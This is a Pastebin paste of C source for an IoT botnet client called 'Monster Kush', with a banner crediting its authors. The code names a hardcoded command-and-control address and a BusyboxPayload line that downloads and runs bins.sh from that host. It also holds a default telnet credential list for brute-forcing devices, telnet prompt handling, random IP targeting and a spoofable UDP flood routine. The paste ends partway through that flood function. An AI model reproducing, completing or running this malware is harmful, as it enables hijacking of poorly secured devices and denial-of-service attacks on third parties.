Advertisement
Guest User

c

a guest
Dec 28th, 2016
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.50 KB | None | 0 0
  1. /*:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2. '##::::'##::'#######::'##::: ##::'######::'########:'########:'########:::::'##:::'##:'##::::'##::'######::'##::::'##::::::::::
  3. ###::'###:'##.... ##: ###:: ##:'##... ##:... ##..:: ##.....:: ##.... ##:::: ##::'##:: ##:::: ##:'##... ##: ##:::: ##::::::::::
  4. ####'####: ##:::: ##: ####: ##: ##:::..::::: ##:::: ##::::::: ##:::: ##:::: ##:'##::: ##:::: ##: ##:::..:: ##:::: ##::::::::::
  5. ## ### ##: ##:::: ##: ## ## ##:. ######::::: ##:::: ######::: ########::::: #####:::: ##:::: ##:. ######:: #########::::::::::
  6. ##. #: ##: ##:::: ##: ##. ####::..... ##:::: ##:::: ##...:::: ##.. ##:::::: ##. ##::: ##:::: ##::..... ##: ##.... ##::::::::::
  7. ##:.:: ##: ##:::: ##: ##:. ###:'##::: ##:::: ##:::: ##::::::: ##::. ##::::: ##:. ##:: ##:::: ##:'##::: ##: ##:::: ##::::::::::
  8. ##:::: ##:. #######:: ##::. ##:. ######::::: ##:::: ########: ##:::. ##:::: ##::. ##:. #######::. ######:: ##:::: ##::::::::::
  9. ..:::::..:::.......:::..::::..:::......::::::..:::::........::..:::::..:::::..::::..:::.......::::......:::..:::::..:::::::::::
  10. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |||||||||||||||||||||||||||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  11. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |/| *** Monster Kush *** |/| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  12. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |/| *** Made Date: *** |/| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  13. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |/| *** 11-22-16 *** |/| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  14. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |/| *** CLIENT *** |/| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  15. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |||||||||||||||||||||||||||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  16. Instragram: @psychedelik_ Psychedelik *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** ~B1NARY~ Twitter: @P2PBOTNET ~/|/|
  17. *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** XMPP: b1nary@nigge.rs || IG: b1narythag0d ~/|/|
  18. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  19. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  20. Me And Psychedelik Met Up In Real Life. *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** Now Think About That For a Minute. /|/|
  21. And We Made This Dank Ass Bot *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** Damn............Mind Fucked. /|/|
  22. That You will be using. *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** #MonsterSecurity #MS2K16 #MSWILNEVERDIE /|/|
  23. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  24. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  25. /|/|/|/|/|/| Shoutout to Swift IG: @Doxingz || Shout out to Narc IG: @narcotixx || Shout To Pychedelik. IG:@psychedelik_ /|/|
  26. /|/|/|/|/|/| Shoutout to Bullet. IG: @autism.py || Shout out to Mr Vendetta Twitter: @vendettaondrugs || /|/|
  27. /|/|/|/|/|/| Shoutout To ~Rev~ Twitter: PmaBotnet || Shoutout to NIghtmare: Instragram: @bins.sh /|/|
  28. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  29. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** ~~~~~~ MonsterSecurity ~~~~~~ *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  30. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
  31. /|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/
  32. */
  33.  
  34. #include <stdlib.h>
  35. #include <stdarg.h>
  36. #include <stdio.h>
  37. #include <sys/socket.h>
  38. #include <sys/types.h>
  39. #include <netinet/in.h>
  40. #include <arpa/inet.h>
  41. #include <netdb.h>
  42. #include <signal.h>
  43. #include <strings.h>
  44. #include <string.h>
  45. #include <sys/utsname.h>
  46. #include <unistd.h>
  47. #include <fcntl.h>
  48. #include <errno.h>
  49. #include <netinet/ip.h>
  50. #include <netinet/udp.h>
  51. #include <netinet/tcp.h>
  52. #include <sys/wait.h>
  53. #include <sys/ioctl.h>
  54. #include <net/if.h>
  55. #include <netinet/ip_icmp.h>
  56.  
  57. #define PR_SET_NAME 15
  58. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
  59. #define PAD_RIGHT 1
  60. #define PAD_ZERO 2
  61. #define PRINT_BUF_LEN 12
  62. #define CMD_IAC 255
  63. #define CMD_WILL 251
  64. #define CMD_WONT 252
  65. #define CMD_DO 253
  66. #define CMD_DONT 254
  67. #define OPT_SGA 3
  68. #define PHI 0x9e3779b9
  69. #define SOCKBUF_SIZE 1024
  70.  
  71.  
  72.  
  73.  
  74. unsigned char *commServer[] = { "81.4.123.16:65535" };
  75.  
  76. char *BusyboxPayload = "cd /tmp/;busbox wget http://81.4.123.16/bins.sh;sh bins.sh;rm -rf bins.sh";
  77.  
  78. char *usernames[] = {
  79. "\0", //(none):(none)
  80. "telnet\0", //telnet:telnet
  81. "admin\0", //admin:admin
  82. "admin\0", //admin:123
  83. "admin\0", //admin:1234
  84. "admin\0", //admin:12345
  85. "admin\0", //admin:password
  86. "admin\0", //admin:qwerty
  87. "root\0", //root:root
  88. "root\0", //root:123
  89. "root\0", //root:1234
  90. "root\0", //root:12345
  91. "root\0", //root:toor
  92. "root\0", //root:password
  93. "root\0", //root:qwerty
  94. "tim\0", //tim:tim
  95. "adm\0", //admin:(none)
  96. "security\0", //security:security
  97. "user\0", //user:password
  98. "User\0", //User:Password
  99. "read\0", //read:synnet
  100. "write\0", //write:synnet
  101. "admin\0", //admin:synnet
  102. "manager\0", //manager:manager
  103. "monitor\0", //monitor:monitor
  104. "tech\0", //tech:tech
  105. "debug\0", //debug:synnet
  106. "tech\0", //tech:(none)
  107.  
  108. };
  109.  
  110. char *passwords[] = {
  111. "\0"
  112. "telnet\0", //telnet:telnet
  113. "admin\0", //admin:admin
  114. "123\0", //admin:123
  115. "1234\0", //admin:1234
  116. "12345\0", //admin:12345
  117. "password\0", //admin:password
  118. "qwerty\0", //admin:qwerty
  119. "root\0", //root:root
  120. "123\0", //root:123
  121. "1234\0", //root:1234
  122. "12345\0", //root:12345
  123. "toor\0", //root:toor
  124. "password\0", //root:password
  125. "qwerty\0", //root:qwerty
  126. "tim\0", //tim:tim
  127. "\0", //adm:(none)
  128. "security\0", //security:security
  129. "password\0", //user:password
  130. "Password\0", //User:Password
  131. "synnet\0", //read:synnet
  132. "synnet\0", //write:synnet
  133. "synnet\0", //admin:synnet
  134. "manager\0", //manager:manager
  135. "monitor\0", //monitor:monitor
  136. "tech\0", //tech:tech
  137. "synnet\0", //debug:synnet
  138. "\0", //tech:(none)
  139.  
  140. };
  141.  
  142. char *advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", (char*)0};
  143. char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
  144. char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", (char*)0};
  145. char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
  146.  
  147. static uint32_t Q[4096], c = 362436;
  148.  
  149. int initConnection();
  150.  
  151. void makeRandomStr(unsigned char *buf, int length);
  152.  
  153. int sockprintf(int sock, char *formatStr, ...);
  154.  
  155. char *inet_ntoa(struct in_addr in);
  156.  
  157. int mainCommSock = 0, currentServer = -1, gotIP = 0;
  158.  
  159. uint32_t *pids;
  160.  
  161. uint32_t scanPid;
  162.  
  163. uint64_t numpids = 0;
  164.  
  165. struct in_addr ourIP;
  166.  
  167. unsigned char macAddress[6] = {0};
  168.  
  169. struct telstate_t
  170. {
  171. int fd;
  172. unsigned int ip;
  173. unsigned char state;
  174. unsigned char complete;
  175. unsigned char usernameInd;
  176. unsigned char passwordInd;
  177. unsigned char tempDirInd;
  178. unsigned int tTimeout;
  179. unsigned short bufUsed;
  180. char *sockbuf;
  181. };
  182.  
  183. void init_rand(uint32_t x)
  184. {
  185. int i;
  186. Q[0] = x;
  187. Q[1] = x + PHI;
  188. Q[2] = x + PHI + PHI;
  189. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  190. }
  191.  
  192. uint32_t rand_cmwc(void)
  193. {
  194. uint64_t t, a = 18782LL;
  195. static uint32_t i = 4095;
  196. uint32_t x, r = 0xfffffffe;
  197. i = (i + 1) & 4095;
  198. t = a * Q[i] + c;
  199. c = (uint32_t)(t >> 32);
  200. x = t + c;
  201. if (x < c)
  202. {
  203. x++;
  204. c++;
  205. }
  206. return (Q[i] = r - x);
  207. }
  208.  
  209. void trim(char *str)
  210. {
  211. int i;
  212. int begin = 0;
  213. int end = strlen(str) - 1;
  214. while (isspace(str[begin])) begin++;
  215. while ((end >= begin) && isspace(str[end])) end--;
  216. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  217. str[i - begin] = '\0';
  218. }
  219.  
  220. static void printchar(unsigned char **str, int c)
  221. {
  222. if (str)
  223. {
  224. **str = c;
  225. ++(*str);
  226. }
  227. else (void)write(1, &c, 1);
  228. }
  229.  
  230. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
  231. {
  232. register int pc = 0, padchar = ' ';
  233. if (width > 0)
  234. {
  235. register int len = 0;
  236. register const unsigned char *ptr;
  237. for (ptr = string; *ptr; ++ptr) ++len;
  238. if (len >= width) width = 0;
  239. else width -= len;
  240. if (pad & PAD_ZERO) padchar = '0';
  241. }
  242. if (!(pad & PAD_RIGHT))
  243. {
  244. for ( ; width > 0; --width)
  245. {
  246. printchar (out, padchar);
  247. ++pc;
  248. }
  249. }
  250. for ( ; *string ; ++string)
  251. {
  252. printchar (out, *string);
  253. ++pc;
  254. }
  255. for ( ; width > 0; --width)
  256. {
  257. printchar (out, padchar);
  258. ++pc;
  259. }
  260. return pc;
  261. }
  262.  
  263. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
  264. {
  265. unsigned char print_buf[PRINT_BUF_LEN];
  266. register unsigned char *s;
  267. register int t, neg = 0, pc = 0;
  268. register unsigned int u = i;
  269.  
  270. if (i == 0)
  271. {
  272. print_buf[0] = '0';
  273. print_buf[1] = '\0';
  274. return prints (out, print_buf, width, pad);
  275. }
  276.  
  277. if (sg && b == 10 && i < 0)
  278. {
  279. neg = 1;
  280. u = -i;
  281. }
  282.  
  283. s = print_buf + PRINT_BUF_LEN-1;
  284. *s = '\0';
  285.  
  286. while (u)
  287. {
  288. t = u % b;
  289. if( t >= 10 )
  290. t += letbase - '0' - 10;
  291. *--s = t + '0';
  292. u /= b;
  293. }
  294.  
  295. if (neg)
  296. {
  297. if( width && (pad & PAD_ZERO) )
  298. {
  299. printchar (out, '-');
  300. ++pc;
  301. --width;
  302. }
  303. else
  304. {
  305. *--s = '-';
  306. }
  307. }
  308. return pc + prints (out, s, width, pad);
  309. }
  310.  
  311. static int print(unsigned char **out, const unsigned char *format, va_list args )
  312. {
  313. register int width, pad;
  314. register int pc = 0;
  315. unsigned char scr[2];
  316.  
  317. for (; *format != 0; ++format)
  318. {
  319. if (*format == '%')
  320. {
  321. ++format;
  322. width = pad = 0;
  323. if (*format == '\0') break;
  324. if (*format == '%') goto out;
  325. if (*format == '-')
  326. {
  327. ++format;
  328. pad = PAD_RIGHT;
  329. }
  330. while (*format == '0')
  331. {
  332. ++format;
  333. pad |= PAD_ZERO;
  334. }
  335. for ( ; *format >= '0' && *format <= '9'; ++format)
  336. {
  337. width *= 10;
  338. width += *format - '0';
  339. }
  340. if( *format == 's' )
  341. {
  342. register char *s = (char *)va_arg( args, int );
  343. pc += prints (out, s?s:"(null)", width, pad);
  344. continue;
  345. }
  346. if( *format == 'd' )
  347. {
  348. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
  349. continue;
  350. }
  351. if( *format == 'x' )
  352. {
  353. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
  354. continue;
  355. }
  356. if( *format == 'X' )
  357. {
  358. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
  359. continue;
  360. }
  361. if( *format == 'u' )
  362. {
  363. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
  364. continue;
  365. }
  366. if( *format == 'c' )
  367. {
  368. scr[0] = (unsigned char)va_arg( args, int );
  369. scr[1] = '\0';
  370. pc += prints (out, scr, width, pad);
  371. continue;
  372. }
  373. }
  374. else
  375. {
  376. out:
  377. printchar (out, *format);
  378. ++pc;
  379. }
  380. }
  381. if (out) **out = '\0';
  382. va_end( args );
  383. return pc;
  384. }
  385.  
  386. int zprintf(const unsigned char *format, ...) {
  387. va_list args;
  388. va_start( args, format );
  389. return print( 0, format, args );
  390. }
  391.  
  392. int szprintf(unsigned char *out, const unsigned char *format, ...)
  393. {
  394. va_list args;
  395. va_start( args, format );
  396. return print( &out, format, args );
  397. }
  398.  
  399. int sockprintf(int sock, char *formatStr, ...)
  400. {
  401. unsigned char *textBuffer = malloc(2048);
  402. memset(textBuffer, 0, 2048);
  403. char *orig = textBuffer;
  404. va_list args;
  405. va_start(args, formatStr);
  406. print(&textBuffer, formatStr, args);
  407. va_end(args);
  408. orig[strlen(orig)] = '\n';
  409. zprintf("buf: %s\n", orig);
  410. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
  411. free(orig);
  412. return q;
  413. }
  414.  
  415. static int *fdopen_pids;
  416.  
  417. int fdpopen(unsigned char *program, register unsigned char *type)
  418. {
  419. register int iop;
  420. int pdes[2], fds, pid;
  421.  
  422. if (*type != 'r' && *type != 'w' || type[1]) return -1;
  423.  
  424. if (pipe(pdes) < 0) return -1;
  425. if (fdopen_pids == NULL)
  426. {
  427. if ((fds = getdtablesize()) <= 0) return -1;
  428. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
  429. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
  430. }
  431.  
  432. switch (pid = vfork())
  433. {
  434. case -1:
  435. close(pdes[0]);
  436. close(pdes[1]);
  437. return -1;
  438. case 0:
  439. if (*type == 'r')
  440. {
  441. if (pdes[1] != 1)
  442. {
  443. dup2(pdes[1], 1);
  444. close(pdes[1]);
  445. }
  446. close(pdes[0]);
  447. }
  448. else
  449. {
  450. if (pdes[0] != 0)
  451. {
  452. (void) dup2(pdes[0], 0);
  453. (void) close(pdes[0]);
  454. }
  455. (void) close(pdes[1]);
  456. }
  457.  
  458. execl("/bin/sh", "sh", "-c", program, NULL);
  459. _exit(127);
  460. }
  461.  
  462. if (*type == 'r')
  463. {
  464. iop = pdes[0];
  465. (void) close(pdes[1]);
  466. }
  467. else
  468. {
  469. iop = pdes[1];
  470. (void) close(pdes[0]);
  471. }
  472.  
  473. fdopen_pids[iop] = pid;
  474. return (iop);
  475. }
  476.  
  477. int fdpclose(int iop)
  478. {
  479. register int fdes;
  480. sigset_t omask, nmask;
  481. int pstat;
  482. register int pid;
  483.  
  484. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
  485. (void) close(iop);
  486. sigemptyset(&nmask);
  487. sigaddset(&nmask, SIGINT);
  488. sigaddset(&nmask, SIGQUIT);
  489. sigaddset(&nmask, SIGHUP);
  490.  
  491. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
  492. do
  493. {
  494. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
  495. }
  496. while (pid == -1 && errno == EINTR);
  497. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
  498. fdopen_pids[fdes] = 0;
  499. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
  500. }
  501.  
  502. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
  503. {
  504. int got = 1, total = 0;
  505. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n')
  506. {
  507. got = read(fd, buffer + total, 1);
  508. total++;
  509. }
  510. return got == 0 ? NULL : buffer;
  511. }
  512.  
  513. static const long hextable[] =
  514. {
  515. [0 ... 255] = -1,
  516. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
  517. ['A'] = 10, 11, 12, 13, 14, 15,
  518. ['a'] = 10, 11, 12, 13, 14, 15
  519. };
  520.  
  521. long parseHex(unsigned char *hex)
  522. {
  523. long ret = 0;
  524. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
  525. return ret;
  526. }
  527.  
  528. int wildString(const unsigned char* pattern, const unsigned char* string)
  529. {
  530. switch(*pattern)
  531. {
  532. case '\0': return *string;
  533. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
  534. case '?': return !(*string && !wildString(pattern+1, string+1));
  535. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
  536. }
  537. }
  538.  
  539. int getHost(unsigned char *toGet, struct in_addr *i)
  540. {
  541. struct hostent *h;
  542. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
  543. return 0;
  544. }
  545.  
  546. void uppercase(unsigned char *str)
  547. {
  548. while(*str)
  549. {
  550. *str = toupper(*str);
  551. str++;
  552. }
  553. }
  554.  
  555. void makeRandomStr(unsigned char *buf, int length)
  556. {
  557. int i = 0;
  558. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
  559. }
  560. int recvLine(int socket, unsigned char *buf, int bufsize) {
  561. memset(buf, 0, bufsize);
  562.  
  563. fd_set myset;
  564. struct timeval tv;
  565. tv.tv_sec = 30;
  566. tv.tv_usec = 0;
  567. FD_ZERO(&myset);
  568. FD_SET(socket, &myset);
  569. int selectRtn, retryCount;
  570. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  571. while(retryCount < 10) {
  572. sockprintf(mainCommSock, "PING");
  573. tv.tv_sec = 30;
  574. tv.tv_usec = 0;
  575. FD_ZERO(&myset);
  576. FD_SET(socket, &myset);
  577. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  578. retryCount++;
  579. continue;
  580. }
  581. break;
  582. }
  583. }
  584. unsigned char tmpchr;
  585. unsigned char *cp;
  586. int count = 0;
  587.  
  588. cp = buf;
  589. while(bufsize-- > 1) {
  590. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
  591. *cp = 0x00;
  592. return -1;
  593. }
  594. *cp++ = tmpchr;
  595. if(tmpchr == '\n') break;
  596. count++;
  597. }
  598. *cp = 0x00;
  599. return count;
  600. }
  601. int connectTimeout(int fd, char *host, int port, int timeout) {
  602. struct sockaddr_in dest_addr;
  603. fd_set myset;
  604. struct timeval tv;
  605. socklen_t lon;
  606.  
  607. int valopt;
  608. long arg = fcntl(fd, F_GETFL, NULL);
  609. arg |= O_NONBLOCK;
  610. fcntl(fd, F_SETFL, arg);
  611.  
  612. dest_addr.sin_family = AF_INET;
  613. dest_addr.sin_port = htons(port);
  614. if(getHost(host, &dest_addr.sin_addr)) return 0;
  615. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  616. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  617. if (res < 0) {
  618. if (errno == EINPROGRESS) {
  619. tv.tv_sec = timeout;
  620. tv.tv_usec = 0;
  621. FD_ZERO(&myset);
  622. FD_SET(fd, &myset);
  623. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
  624. lon = sizeof(int);
  625. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  626. if (valopt) return 0;
  627. }
  628. else return 0;
  629. }
  630. else return 0;
  631. }
  632. arg = fcntl(fd, F_GETFL, NULL);
  633. arg &= (~O_NONBLOCK);
  634. fcntl(fd, F_SETFL, arg);
  635. return 1;
  636. }
  637. int listFork() {
  638. uint32_t parent, *newpids, i;
  639. parent = fork();
  640. if (parent <= 0) return parent;
  641. numpids++;
  642. newpids = (uint32_t*)malloc((numpids + 1) * 4);
  643. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
  644. newpids[numpids - 1] = parent;
  645. free(pids);
  646. pids = newpids;
  647. return parent;
  648. }
  649. int negotiate(int sock, unsigned char *buf, int len) {
  650. unsigned char c;
  651. switch (buf[1]) {
  652. case CMD_IAC: return 0;
  653. case CMD_WILL:
  654. case CMD_WONT:
  655. case CMD_DO:
  656. case CMD_DONT:
  657. c = CMD_IAC;
  658. send(sock, &c, 1, MSG_NOSIGNAL);
  659. if (CMD_WONT == buf[1]) c = CMD_DONT;
  660. else if (CMD_DONT == buf[1]) c = CMD_WONT;
  661. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
  662. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
  663. send(sock, &c, 1, MSG_NOSIGNAL);
  664. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
  665. break;
  666. default:
  667. break;
  668. }
  669. return 0;
  670. }
  671. int matchPrompt(char *bufStr) {
  672. char *prompts = ":>%$#\0";
  673. int bufLen = strlen(bufStr);
  674. int i, q = 0;
  675. for(i = 0; i < strlen(prompts); i++) {
  676. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
  677. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
  678. }
  679. return 0;
  680. }
  681.  
  682. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
  683. {
  684. int bufferUsed = initialIndex, got = 0, found = 0;
  685. fd_set myset;
  686. struct timeval tv;
  687. tv.tv_sec = timeout;
  688. tv.tv_usec = timeoutusec;
  689. unsigned char *initialRead = NULL;
  690.  
  691. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
  692. {
  693. FD_ZERO(&myset);
  694. FD_SET(fd, &myset);
  695.  
  696. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
  697. initialRead = buffer + bufferUsed;
  698. got = recv(fd, initialRead, 1, 0);
  699.  
  700. if(got == -1 || got == 0) return 0;
  701. bufferUsed += got;
  702.  
  703. if(*initialRead == 0xFF)
  704. {
  705. got = recv(fd, initialRead + 1, 2, 0);
  706. if(got == -1 || got == 0) return 0;
  707. bufferUsed += got;
  708. if(!negotiate(fd, initialRead, 3)) return 0;
  709. }
  710. else
  711. {
  712. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer)))
  713. {
  714. found = 1;
  715. break;
  716. }
  717. }
  718. }
  719. if(found) return 1;
  720. return 0;
  721. }
  722.  
  723. in_addr_t getRandomIP(in_addr_t netmask)
  724. {
  725. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
  726. return tmp ^ ( rand_cmwc() & ~netmask);
  727. }
  728.  
  729. unsigned short csum (unsigned short *buf, int count)
  730. {
  731. register uint64_t sum = 0;
  732. while( count > 1 )
  733. {
  734. sum += *buf++;
  735. count -= 2;
  736. }
  737. if(count > 0)
  738. {
  739. sum += *(unsigned char *)buf;
  740. }
  741. while (sum>>16)
  742. {
  743. sum = (sum & 0xffff) + (sum >> 16);
  744. }
  745. return (uint16_t)(~sum);
  746. }
  747.  
  748. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
  749. {
  750. struct tcp_pseudo
  751. {
  752. unsigned long src_addr;
  753. unsigned long dst_addr;
  754. unsigned char zero;
  755. unsigned char proto;
  756. unsigned short length;
  757. }
  758. pseudohead;
  759. unsigned short total_len = iph->tot_len;
  760. pseudohead.src_addr=iph->saddr;
  761. pseudohead.dst_addr=iph->daddr;
  762. pseudohead.zero=0;
  763. pseudohead.proto=IPPROTO_TCP;
  764. pseudohead.length=htons(sizeof(struct tcphdr));
  765. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
  766. unsigned short *tcp = malloc(totaltcp_len);
  767. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
  768. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
  769. unsigned short output = csum(tcp,totaltcp_len);
  770. free(tcp);
  771. return output;
  772. }
  773.  
  774. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
  775. {
  776. iph->ihl = 5;
  777. iph->version = 4;
  778. iph->tos = 0;
  779. iph->tot_len = sizeof(struct iphdr) + packetSize;
  780. iph->id = rand_cmwc();
  781. iph->frag_off = 0;
  782. iph->ttl = MAXTTL;
  783. iph->protocol = protocol;
  784. iph->check = 0;
  785. iph->saddr = source;
  786. iph->daddr = dest;
  787. }
  788.  
  789. int sclose(int fd)
  790. {
  791. if(3 > fd) return 1;
  792. close(fd);
  793. return 0;
  794. }
  795.  
  796.  
  797.  
  798. void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval) {
  799. struct sockaddr_in dest_addr;
  800. dest_addr.sin_family = AF_INET;
  801. if(port == 0) dest_addr.sin_port = rand_cmwc();
  802. else dest_addr.sin_port = htons(port);
  803. if(getHost(target, &dest_addr.sin_addr)) return;
  804. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  805. register unsigned int pollRegister;
  806. pollRegister = pollinterval;
  807. if(spoofit == 32)
  808. {
  809. int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  810. if(!sockfd)
  811. {
  812. sockprintf(mainCommSock, "Failed opening raw socket.");
  813. return;
  814. }
  815. unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
  816. if(buf == NULL) return;
  817. memset(buf, 0, packetsize + 1);
  818. makeRandomStr(buf, packetsize);
  819. int end = time(NULL) + timeEnd;
  820. register unsigned int i = 0;
  821. while(1)
  822. {
  823. sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  824. if(i == pollRegister)
  825. {
  826. if(port == 0) dest_addr.sin_port = rand_cmwc();
  827. if(time(NULL) > end) break;
  828. i = 0;
  829. continue;
  830. }
  831. i++;
  832. }
  833. }
  834. else {
  835. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  836. if(!sockfd)
  837. {
  838. sockprintf(mainCommSock, "Failed opening raw socket.");
  839. return;
  840. }
  841. int tmp = 1;
  842. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  843. {
  844. sockprintf(mainCommSock, "Failed setting raw headers mode.");
  845. return;
  846. }
  847.  
  848. int counter = 50;
  849. while(counter--)
  850. {
  851. srand(time(NULL) ^ rand_cmwc());
  852. init_rand(rand());
  853. }
  854.  
  855. in_addr_t netmask;
  856.  
  857. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  858. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  859.  
  860. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
  861. struct iphdr *iph = (struct iphdr *)packet;
